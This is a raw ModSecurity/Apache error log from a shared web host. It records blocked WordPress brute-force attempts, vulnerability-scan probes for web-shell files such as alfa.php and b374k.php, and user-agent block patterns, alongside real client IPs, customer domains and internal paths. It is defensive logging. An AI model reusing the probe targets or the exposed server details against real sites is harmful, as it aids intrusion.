[Tue May 26 15:57:41.642003 2026] [security2:error] [pid 745492:tid 745747] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1nYmEQglTmoWcfxKVwgAAAP8"]
[Tue May 26 15:57:42.105737 2026] [security2:error] [pid 745492:tid 745744] [client 78.47.98.55:34528] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahV1nomEQglTmoWcfxKV1gAAAPw"], referer: http://ucdc.co.in/
[Tue May 26 15:57:42.505590 2026] [security2:error] [pid 745492:tid 745734] [client 103.153.130.62:64281] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1nomEQglTmoWcfxKV3QAAAPI"]
[Tue May 26 15:57:42.505842 2026] [security2:error] [pid 745492:tid 745734] [client 103.153.130.62:64281] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1nomEQglTmoWcfxKV3QAAAPI"]
[Tue May 26 15:57:42.582752 2026] [security2:error] [pid 745492:tid 745700] [client 107.150.120.129:1841] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "dimcorp.jhonweb.com"] [uri "/"] [unique_id "ahV1nomEQglTmoWcfxKV4QAAANA"]
[Tue May 26 15:57:43.017676 2026] [security2:error] [pid 745492:tid 745751] [client 106.219.85.83:11570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1nomEQglTmoWcfxKV6QAAAQM"]
[Tue May 26 15:57:43.017872 2026] [security2:error] [pid 745492:tid 745751] [client 106.219.85.83:11570] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1nomEQglTmoWcfxKV6QAAAQM"]
[Tue May 26 15:57:43.707858 2026] [security2:error] [pid 745492:tid 745694] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1n4mEQglTmoWcfxKV9gAAAMo"]
[Tue May 26 15:57:44.088656 2026] [security2:error] [pid 745492:tid 745713] [client 89.110.64.239:57109] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "89.110.64.239" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahV1oImEQglTmoWcfxKWDAAAAN0"], referer: https://www.yourstorybag.com/what-kind-of-questions-do-you-ask-when-you-tell-stories-to-children/
[Tue May 26 15:57:44.088761 2026] [security2:error] [pid 745492:tid 745713] [client 89.110.64.239:57109] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahV1oImEQglTmoWcfxKWDAAAAN0"], referer: https://www.yourstorybag.com/what-kind-of-questions-do-you-ask-when-you-tell-stories-to-children/
[Tue May 26 15:57:45.859483 2026] [security2:error] [pid 745492:tid 745744] [client 143.110.243.118:47758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/alfa.php"] [unique_id "ahV1oYmEQglTmoWcfxKWOgAAAPw"]
[Tue May 26 15:57:45.916799 2026] [security2:error] [pid 745492:tid 745706] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1oYmEQglTmoWcfxKWMgAAANY"]
[Tue May 26 15:57:46.169413 2026] [security2:error] [pid 745492:tid 745723] [client 103.44.52.196:38336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1oomEQglTmoWcfxKWQgAAAOc"]
[Tue May 26 15:57:46.169539 2026] [security2:error] [pid 745492:tid 745723] [client 103.44.52.196:38336] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1oomEQglTmoWcfxKWQgAAAOc"]
[Tue May 26 15:57:46.326812 2026] [proxy:error] [pid 745492:tid 745628] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:57:46.326860 2026] [proxy_http:error] [pid 745492:tid 745628] [client 147.185.132.118:63164] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:57:46.327430 2026] [proxy:error] [pid 745492:tid 745628] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:57:46.327471 2026] [proxy_http:error] [pid 745492:tid 745628] [client 147.185.132.118:63164] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:57:47.467034 2026] [security2:error] [pid 745492:tid 745596] [remote 91.134.89.60:50260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.89.134.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahV1o4mEQglTmoWcfxKWYQAAjWQ"]
[Tue May 26 15:57:47.769832 2026] [security2:error] [pid 745492:tid 745656] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1o4mEQglTmoWcfxKWaQAAAKQ"]
[Tue May 26 15:57:48.576075 2026] [security2:error] [pid 745492:tid 745683] [client 223.123.125.8:64780] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 8.125.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1pImEQglTmoWcfxKWjgAAAL8"]
[Tue May 26 15:57:48.576296 2026] [security2:error] [pid 745492:tid 745683] [client 223.123.125.8:64780] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1pImEQglTmoWcfxKWjgAAAL8"]
[Tue May 26 15:57:48.710725 2026] [security2:error] [pid 745492:tid 745681] [client 45.15.73.169:37173] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 169.73.15.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahV1pImEQglTmoWcfxKWjQAAAL0"], referer: https://www.yourstorybag.com/what-kind-of-questions-do-you-ask-when-you-tell-stories-to-children/
[Tue May 26 15:57:48.710905 2026] [security2:error] [pid 745492:tid 745681] [client 45.15.73.169:37173] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahV1pImEQglTmoWcfxKWjQAAAL0"], referer: https://www.yourstorybag.com/what-kind-of-questions-do-you-ask-when-you-tell-stories-to-children/
[Tue May 26 15:57:48.947668 2026] [security2:error] [pid 745492:tid 745661] [client 91.238.181.19:49158] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1pImEQglTmoWcfxKWmQAAAKk"]
[Tue May 26 15:57:49.309880 2026] [security2:error] [pid 745492:tid 745716] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1pImEQglTmoWcfxKWnAAAAOA"]
[Tue May 26 15:57:49.564228 2026] [security2:error] [pid 745492:tid 745635] [client 47.128.56.109:65254] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/robots.txt"] [unique_id "ahV1pYmEQglTmoWcfxKWqwAAAI8"]
[Tue May 26 15:57:50.923323 2026] [security2:error] [pid 745492:tid 745641] [client 91.238.181.19:53360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1pomEQglTmoWcfxKWzAAAAJU"]
[Tue May 26 15:57:52.073368 2026] [security2:error] [pid 745492:tid 745686] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1p4mEQglTmoWcfxKW4wAAAMI"]
[Tue May 26 15:57:52.654579 2026] [security2:error] [pid 745492:tid 745681] [client 91.238.181.19:53388] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1qImEQglTmoWcfxKXAwAAAL0"]
[Tue May 26 15:57:52.706810 2026] [security2:error] [pid 745492:tid 745657] [client 103.153.130.62:65352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1qImEQglTmoWcfxKXBQAAAKU"]
[Tue May 26 15:57:52.706922 2026] [security2:error] [pid 745492:tid 745657] [client 103.153.130.62:65352] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1qImEQglTmoWcfxKXBQAAAKU"]
[Tue May 26 15:57:52.997566 2026] [security2:error] [pid 745492:tid 745672] [client 66.249.64.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "glorodbalsa.com"] [uri "/index.php"] [unique_id "ahV1qImEQglTmoWcfxKXCwAAALQ"]
[Tue May 26 15:57:52.997915 2026] [security2:error] [pid 745492:tid 745745] [client 66.249.64.40:38104] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "glorodbalsa.com"] [uri "/index.php"] [unique_id "ahV1qImEQglTmoWcfxKXBgAAAP0"]
[Tue May 26 15:57:53.408117 2026] [security2:error] [pid 745492:tid 745663] [client 106.219.85.83:7223] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1qYmEQglTmoWcfxKXIAAAAKs"]
[Tue May 26 15:57:53.408209 2026] [security2:error] [pid 745492:tid 745663] [client 106.219.85.83:7223] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1qYmEQglTmoWcfxKXIAAAAKs"]
[Tue May 26 15:57:53.459103 2026] [security2:error] [pid 745492:tid 745707] [client 66.249.64.37:57695] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "glorodbalsa.com"] [uri "/index.php"] [unique_id "ahV1qYmEQglTmoWcfxKXFgAAANc"]
[Tue May 26 15:57:54.316323 2026] [security2:error] [pid 745492:tid 745697] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1qYmEQglTmoWcfxKXNQAAAM0"]
[Tue May 26 15:57:54.639674 2026] [security2:error] [pid 745492:tid 745747] [client 91.238.181.19:53408] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1qomEQglTmoWcfxKXUAAAAP8"]
[Tue May 26 15:57:55.168612 2026] [security2:error] [pid 745492:tid 745720] [client 14.179.34.192:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1qomEQglTmoWcfxKXUwAAAOQ"]
[Tue May 26 15:57:56.099701 2026] [security2:error] [pid 745492:tid 745678] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1q4mEQglTmoWcfxKXawAAALo"]
[Tue May 26 15:57:56.391778 2026] [security2:error] [pid 745492:tid 745705] [client 91.238.181.19:53430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1rImEQglTmoWcfxKXgAAAANU"]
[Tue May 26 15:57:57.040108 2026] [security2:error] [pid 745492:tid 745630] [client 103.44.52.196:44580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1rImEQglTmoWcfxKXlQAAAIo"]
[Tue May 26 15:57:57.040290 2026] [security2:error] [pid 745492:tid 745630] [client 103.44.52.196:44580] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1rImEQglTmoWcfxKXlQAAAIo"]
[Tue May 26 15:57:58.243870 2026] [security2:error] [pid 745492:tid 745668] [client 91.238.181.19:53442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1romEQglTmoWcfxKXwQAAALA"]
[Tue May 26 15:57:59.578414 2026] [security2:error] [pid 745492:tid 745647] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1r4mEQglTmoWcfxKX4QAAAJs"]
[Tue May 26 15:57:59.652353 2026] [security2:error] [pid 745492:tid 745639] [client 143.110.243.118:55242] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/b374k.php"] [unique_id "ahV1r4mEQglTmoWcfxKX9QAAAJM"]
[Tue May 26 15:58:00.108715 2026] [security2:error] [pid 745492:tid 745645] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1r4mEQglTmoWcfxKX-AAAAJk"]
[Tue May 26 15:58:00.277550 2026] [security2:error] [pid 745492:tid 745652] [client 91.238.181.19:40872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1sImEQglTmoWcfxKYBgAAAKA"]
[Tue May 26 15:58:00.301782 2026] [security2:error] [pid 745492:tid 745685] [client 223.123.125.8:64781] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 8.125.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1sImEQglTmoWcfxKYBAAAAME"]
[Tue May 26 15:58:00.301990 2026] [security2:error] [pid 745492:tid 745685] [client 223.123.125.8:64781] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1sImEQglTmoWcfxKYBAAAAME"]
[Tue May 26 15:58:02.063114 2026] [security2:error] [pid 745492:tid 745695] [client 91.238.181.19:40882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1somEQglTmoWcfxKYSQAAAMs"]
[Tue May 26 15:58:02.189503 2026] [security2:error] [pid 745492:tid 745656] [client 114.119.133.194:24321] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahV1somEQglTmoWcfxKYTwAAAKQ"], referer: http://haddingtonwines.com/cart?remove_item=88f0bf2899c595146bff13b20342eb6a
[Tue May 26 15:58:02.433665 2026] [security2:error] [pid 745492:tid 745685] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1sYmEQglTmoWcfxKYQwAAAME"]
[Tue May 26 15:58:02.539106 2026] [autoindex:error] [pid 745492:tid 745663] [client 185.169.4.152:62071] AH01276: Cannot serve directory /home2/ankarzwy/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 15:58:02.685133 2026] [security2:error] [pid 745492:tid 745734] [client 74.7.175.135:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.avprealty.com"] [uri "/index.php"] [unique_id "ahV1sYmEQglTmoWcfxKYPAAAAPI"]
[Tue May 26 15:58:02.685165 2026] [security2:error] [pid 745492:tid 745734] [client 74.7.175.135:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.avprealty.com"] [uri "/index.php"] [unique_id "ahV1sYmEQglTmoWcfxKYPAAAAPI"]
[Tue May 26 15:58:02.700492 2026] [security2:error] [pid 745492:tid 745703] [client 74.7.175.135:44990] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.avprealty.com"] [uri "/robots.txt"] [unique_id "ahV1sYmEQglTmoWcfxKYOAAA0y0"]
[Tue May 26 15:58:02.977153 2026] [security2:error] [pid 745492:tid 745730] [client 74.7.175.135:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "avprealty.com"] [uri "/index.php"] [unique_id "ahV1somEQglTmoWcfxKYbgAAAO4"], referer: https://www.avprealty.com/robots.txt
[Tue May 26 15:58:02.977904 2026] [security2:error] [pid 745492:tid 745627] [client 74.7.175.135:45006] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "avprealty.com"] [uri "/robots.txt"] [unique_id "ahV1somEQglTmoWcfxKYbAAAhyY"], referer: https://www.avprealty.com/robots.txt
[Tue May 26 15:58:03.043340 2026] [security2:error] [pid 745492:tid 745684] [client 74.7.241.137:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "avprealty.com"] [uri "/index.php"] [unique_id "ahV1somEQglTmoWcfxKYcgAAAMA"]
[Tue May 26 15:58:03.044325 2026] [security2:error] [pid 745492:tid 745720] [client 74.7.241.137:45844] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "avprealty.com"] [uri "/robots.txt"] [unique_id "ahV1somEQglTmoWcfxKYcAAA5Cs"]
[Tue May 26 15:58:03.102766 2026] [security2:error] [pid 745492:tid 745655] [client 103.153.130.62:49258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1s4mEQglTmoWcfxKYfQAAAKM"]
[Tue May 26 15:58:03.102893 2026] [security2:error] [pid 745492:tid 745655] [client 103.153.130.62:49258] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1s4mEQglTmoWcfxKYfQAAAKM"]
[Tue May 26 15:58:03.656659 2026] [security2:error] [pid 745492:tid 745738] [client 91.238.181.19:40896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1s4mEQglTmoWcfxKYkQAAAPY"]
[Tue May 26 15:58:03.698703 2026] [security2:error] [pid 745492:tid 745752] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1s4mEQglTmoWcfxKYhAAAAQQ"]
